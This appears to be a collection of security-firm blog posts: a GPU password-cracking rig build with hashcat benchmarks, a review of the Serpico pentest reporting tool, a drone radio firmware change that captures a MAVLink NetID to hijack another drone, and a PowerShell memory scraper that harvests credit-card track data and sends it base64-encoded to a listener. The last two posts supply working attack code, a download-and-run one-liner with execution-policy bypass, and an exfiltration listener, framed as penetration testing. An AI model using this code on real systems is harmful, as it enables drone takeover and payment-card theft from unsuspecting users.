This build doesn't require any "black magic" or hours of frustration the way desktop components can. If you follow this blog and its parts list, you'll have a working rig in 3 hours. These instructions should remove the anxiety of spending five figures on hardware without knowing whether you'll bang your head against it for days.
The goal: upgrade our current rig from six GTX 970s to eight GTX 1080s. And don't blow a fuse.
Nowadays building mid-grade to high-end password crackers is like playing with legos, albeit expensive legos.
We did a time lapse of the build:
There are a few things we learned during purchasing and assembly.
The memory slots are not labeled. Fill the banks similar to this image.
In the image below you can see the brackets that attach to the rear of the GPU for added support. Probably not needed but if you were to ship this rig I'd install them. This thing is HEAVY!
We had no hardware issues, but to be safe we installed one GPU, booted the system, and verified it could POST before installing the OS. Once Ubuntu finished installing, we reinstalled the remaining GPUs. Since things went so smoothly, next time I'd just install all the GPUs from the start and fire it up. Nothing to worry about.
Not going to cover this in detail, but here are a few things we considered.
Once the OS is installed, verify the GPUs are detected:
lspci | grep VGA
Update and install dependencies for drivers and hashcat
sudo apt-get update && sudo apt-get upgrade
sudo apt-get install gcc make p7zip-full git lsb-core
Download Nvidia drivers. Nvidia 375.26 was current at the time of this build (January 2017).
UPDATE 4/10/2017 - If using 1080 Ti, use driver 378.13
wget http://us.download.nvidia.com/XFree86/Linux-x86_64/375.26/NVIDIA-Linux-x86_64-375.26.run
chmod +x NVIDIA-Linux-x86_64-375.26.run
sudo ./NVIDIA-Linux-x86_64-375.26.run
If you get warning messages about 32-bit compatibility libraries, you can ignore them. Here's an example:
WARNING: Unable to find a suitable destination to install 32-bit compatibility libraries. Your system may not be set up for 32-bit compatibility. 32-bit compatibility files will not be installed; if you wish to install them, re-run the installation and set a valid directory with the --compat32-libdir option
Install the OpenCL runtime (not required, but why not use those CPUs too?)
wget http://registrationcenter-download.intel.com/akdlm/irc_nas/9019/opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz
tar -xvf opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz
cd opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25
./install.sh
Download and extract hashcat:
wget https://hashcat.net/files/hashcat-3.30.7z
7z x hashcat-3.30.7z
cd hashcat-3.30
Test hashcat by running a benchmark... at 341 GH/s!
meatball@kraken3:~/hashcat-3.30$ ./hashcat64.bin -m 1000 -b
hashcat (v3.30) starting in benchmark mode...

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #2: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #3: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #4: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #5: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #6: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #7: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #8: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU

Hashtype: NTLM

Speed.Dev.#1.....: 42896.1 MH/s (62.48ms)
Speed.Dev.#2.....: 42604.1 MH/s (62.97ms)
Speed.Dev.#3.....: 42799.0 MH/s (62.57ms)
Speed.Dev.#4.....: 42098.9 MH/s (63.68ms)
Speed.Dev.#5.....: 42871.5 MH/s (62.57ms)
Speed.Dev.#6.....: 42825.0 MH/s (62.64ms)
Speed.Dev.#7.....: 42848.9 MH/s (62.54ms)
Speed.Dev.#8.....: 42449.8 MH/s (63.16ms)
Speed.Dev.#*.....: 341.4 GH/s

Started: Mon Feb 13 17:54:12 2017
Stopped: Mon Feb 13 17:54:31 2017
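As a quick sanity check, the per-device speeds in the benchmark output sum to the aggregate figure hashcat reports:

```python
# Per-device NTLM speeds from the benchmark output, in MH/s
speeds = [42896.1, 42604.1, 42799.0, 42098.9,
          42871.5, 42825.0, 42848.9, 42449.8]

total_gh = sum(speeds) / 1000  # MH/s -> GH/s
print(f"{total_gh:.1f} GH/s")  # prints "341.4 GH/s"
```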
Install dependencies
sudo apt-get update
sudo apt-get install mysql-server libmysqlclient-dev redis-server openssl
mysql_secure_installation
Optimize the database
vim /etc/mysql/my.cnf
Add the following line under the [mysqld] section:
innodb_flush_log_at_trx_commit = 0
Restart mysql
service mysql restart
Install RVM - (commands below are from https://rvm.io/rvm/install)
gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
\curl -sSL https://get.rvm.io | bash -s stable --ruby
Download and setup Hashview
git clone https://github.com/hashview/hashview
cd hashview
Install gems (from Hashview directory)
rvm install ruby-2.2.2
gem install bundler
bundle install
Setup database connectivity
cp config/database.yml.example config/database.yml
vim config/database.yml
Create database
RACK_ENV=production rake db:setup
In another terminal or screen session, kick off resque
RACK_ENV=production TERM_CHILD=1 QUEUE=* rake resque:work
Note: in production mode, no output will be displayed until a job has started.
Run Hashview
RACK_ENV=production ruby hashview.rb
Start a job and start cracking!
Then intensely watch analytics in realtime while sipping on your favorite cocktail
We just bought our second 8 GPU rig! In a future post we'll show you how to easily support distributed cracking using Hashview.
@caseycammilleri
TL;DR: Reporting sucks; rarely does anyone enjoy it. Serpico is a tool that helps with reporting and makes it suck less through collaboration and automation, saving you time that you'd rather spend pentesting. Serpico is easy to install and works out of the box, yet is highly customizable. Automating AND customizing your reports has never been more painless (I've tried lots of solutions). It might make you enjoy reporting...maybe 😉
https://www.github.com/serpicoproject
A case study in pentest reporting using Serpico
I first learned of Serpico through a good friend (and project developer) Pete Arzamendi (bokojan). It was developed by pentesters faced with the same reporting challenges I often battled. Will Vandevanter (@_will_is) used his wickedly awesome knowledge on Office XML to develop Serpico, a powerful pentest reporting tool. He’s also the reason why I’m obsessed with Ruby and Sinatra.
So you might be wondering: haven't I heard of Dradis or MagicTree? Yes, I've heard of them, and with every new release I'd install them and hope they'd ease our reporting pain, but they always fell short.
Our existing solution was a report template in Word with custom document properties as variables, plus another Word document containing all the findings that we'd crib from. Unfortunately, the existing reporting tools actually added time because we were always heavily modifying them or dealing with software and report-generation errors.
Existing challenges related to report automation:
Features of Serpico and how we benefit from them
Serpico was quick and easy to install. I went from install to a customized generated report within 30 minutes. Update: Recently an omnibus packaged installer was developed, making the install even faster! I added a finding to a test report and out popped a Word docx with no errors and no funky formatting issues, exactly as I always wanted. Will has done some research with Office XML, giving him a good understanding of all the Microsoft nuances that make this task more difficult than you'd think.
Here is a brief list of features that I find useful as a penetration tester:
Serpico supports both. Currently we use a centralized model: all users connect to one instance of Serpico to do reporting. However, on a couple of occasions we were forced to do an onsite pentest with no Internet access and without any sensitive data leaving the premises. One of us simply installed Serpico locally, and using its import and export features we were able to move all of our templated findings to the local instance very quickly.
I wrote this on the plane to Blackhat and Defcon 2016. The Serpico team asked me to join them at Blackhat Arsenal and I'm happy to help! Stop by to see a working demo and say hi. Follow @SerpicoProject for future updates.
Recently some of us here at shellntel have been building quadcopters and autonomous vehicles for fun. We are big fans of the Pixhawk flight controller for its awesome autonomous capabilities. We are also big fans of privacy. As much as we like to build and fly these drones, we realize doing so in an irresponsible way can cause concern. We started looking into the various drone communications and discovered a design flaw that allowed us to take control of any drone flying with a specific telemetry protocol.
Telemetry allows the drone to exchange information and commands wirelessly with a ground station. This includes sending/receiving GPS coordinates, waypoints, throttle adjustments, arm and disarm commands, pretty much anything, including a serial shell.
The design flaw is not unique to Pixhawk, but rather lies in the Mavlink protocol. Mavlink is used by many products, including: Parrot AR.Drone (with Flight Recorder), ArduPilot, PX4FMU, pxIMU, SmartAP, MatrixPilot, Armazila 10dM3UOP88, Hexo+, TauLabs and AutoQuad. All of these companies make great products, but if they adopt the Mavlink protocol as is, it may be possible to hijack their drones (and any other drone using Mavlink).
According to its documentation, each Mavlink radio pair is set up with a NetID, or channel. This is done to prevent two radio pairs from interfering with each other. By default this value is set to 25, but the user can change it. To hijack one of these drones, all you'd need to do is set your transmitter to the same NetID as the target drone.
Looking at the protocol spec, each data packet sent by the radio includes the NetID in its transmission! This means all we need to do is listen for a single packet within the frequency spectrum, capture it, carve out the NetID, and set our radio to use it. This is surprisingly easy.
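To make the carving step concrete, here's a minimal sketch (in Python, separate from the radio firmware) of pulling the NetID out of a decoded header. It assumes the two NetID bytes sit at the start of the golay-decoded header, matching the gout[0]/gout[1] check in radio.c; the little-endian byte order is my assumption.

```python
def carve_netid(decoded_header: bytes) -> int:
    """Extract the NetID from a golay-decoded packet header.

    Assumes the NetID occupies the first two decoded bytes
    (gout[0] and gout[1] in radio.c); little-endian byte
    order is an assumption here.
    """
    if len(decoded_header) < 2:
        raise ValueError("header too short")
    return decoded_header[0] | (decoded_header[1] << 8)

# A header whose first two bytes carry the default NetID of 25
print(carve_netid(bytes([25, 0, 0, 0, 0, 0])))  # prints 25
```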
Using these radios (we used v2), we can modify the open-source firmware to do exactly this. The following changes were made to radio.c, which, when compiled, is flashed to the transmitter.
Original Code:
// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
    // its not for our network ID
    debug("netid %x %x\n", (unsigned)gout[0], (unsigned)gout[1]);
    goto failed;
}
Modified Code:
// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
    // its not for our network ID
    /* Modified by __int128 */
    // Set our radio to use the captured packet's NetID
    param_set(PARAM_NETID, gout[0]);
    // Save the value to flash
    param_save();
    // To read the new value we need to reboot
    RSTSRC |= (1 << 4);
    /* End of what was added by __int128 */
}
The variable gout[0] is set earlier in radio.c and is populated with the NetID of every captured packet. This block of code is only hit when our radio hears a packet from another radio set to a different NetID than ours (which is good, because we don't want to reboot each time we hear a packet on our own NetID). Anyway, that's it: three lines of code is all it takes to hijack any drone using Mavlink. Compile it, flash the radio, and you're good to go. It works surprisingly well and is super quick.
During the post exploitation phase of a penetration test, I like to provide the client with examples of what could happen if a breach were to take place. One of the most common examples of this is credit card theft. To demonstrate this threat, I created a PowerShell memory scraper against whatever application (many times browsers) the target is using to harvest track data. Why PowerShell? Because anti-virus doesn't prevent it and it provides me the ability to quickly modify the script, tailoring it for the application used within the organization.
Thanks to the awesomeness of @mattifestation and PowerSploit, you can use Out-Minidump to create a memory dump of a process. I created a lightweight script with logic to continuously dump a process's memory and scrape it for track data. Using Internet Explorer as an example, the script performs the following:
You can download the script from GitHub:
git clone https://www.github.com/shellntel/scripts
Here is a screenshot of the memory scraper in action harvesting track data:
very old expired credit card...don't even know why I redacted it
I created a few features that I find handy. One is the ability to encode and exfiltrate track data to a listener I have set up. It base64 encodes the track data and makes an HTTP GET request with the data included. I never send this data across the Internet, only to an internal box under my control or over an encrypted tunnel. You can use any method to set up a listener, but my favorite is:
python -m SimpleHTTPServer 80
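For reference, here's a minimal Python 3 sketch of a listener that decodes the incoming base64 blobs instead of just logging raw requests. The query parameter name "d" is hypothetical; adjust it to match whatever the script actually sends.

```python
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class ExfilHandler(BaseHTTPRequestHandler):
    """Decode base64 track data arriving via GET query strings."""

    def do_GET(self):
        # "d" is a hypothetical parameter name -- match it to the script
        params = parse_qs(urlparse(self.path).query)
        for blob in params.get("d", []):
            print(base64.b64decode(blob).decode("ascii", "replace"))
        self.send_response(200)
        self.end_headers()

# To run: HTTPServer(("0.0.0.0", 80), ExfilHandler).serve_forever()
```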
The code supports harvesting plain card numbers when track data is not available, which I've used with success, but it occasionally produces false positives. There is a Luhn check and some regexes to help reduce them, but if that isn't enough, you can specify an IIN/BIN (http://www.binlist.net) to match on. Matching on IINs comes in handy when your client/target is in the financial industry. Coworker @curi0usJack helped me squash bugs and implemented duplicate checking so we're not sending and logging the same data over and over.
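For illustration, the Luhn checksum itself fits in a few lines. This is a generic Python sketch of the algorithm, not the exact check the PowerShell script implements:

```python
def luhn_valid(number: str) -> bool:
    """Return True if a digit string passes the Luhn checksum."""
    digits = [int(d) for d in number if d.isdigit()]
    total = 0
    # Double every second digit from the right; subtracting 9 is
    # equivalent to summing the digits of the doubled value
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

print(luhn_valid("4111111111111111"))  # prints True (well-known test PAN)
print(luhn_valid("4111111111111112"))  # prints False
```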
Many times my targeted users are working in a terminal server environment. This makes my life easy because I can run the memory scraper in one centralized location (the terminal servers), but since there are multiple users, you'll want to limit the memory scraping to processes owned by your targeted users. Otherwise you could be dumping memory from hundreds of processes that don't contain credit card data. For this reason, I built a function that checks the process owner against the values of the -User parameter. My common workflow is to identify my targeted users by group name in Active Directory, specify them with the -User parameter, and just let the memory scraper bake for a few days.
Everyone likes one-liners. If you want to run the memory scraper (example process is iexplore) run the following from the target system:
powershell.exe -exec bypass -Command "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/shellntel/scripts/master/mem_scraper.ps1','mem_scraper.ps1');./mem_scraper.ps1 -Proc iexplore;"
I've found this method to be the quickest and most reliable. It only takes me minutes to narrow down my targets and deploy. The script can be downloaded from Github and will work with PowerShell v2 and v3. I encourage you to give it a try on your next pentest (or within your organization with permission of course) and provide feedback.
Happy harvesting!
@CaseyCammilleri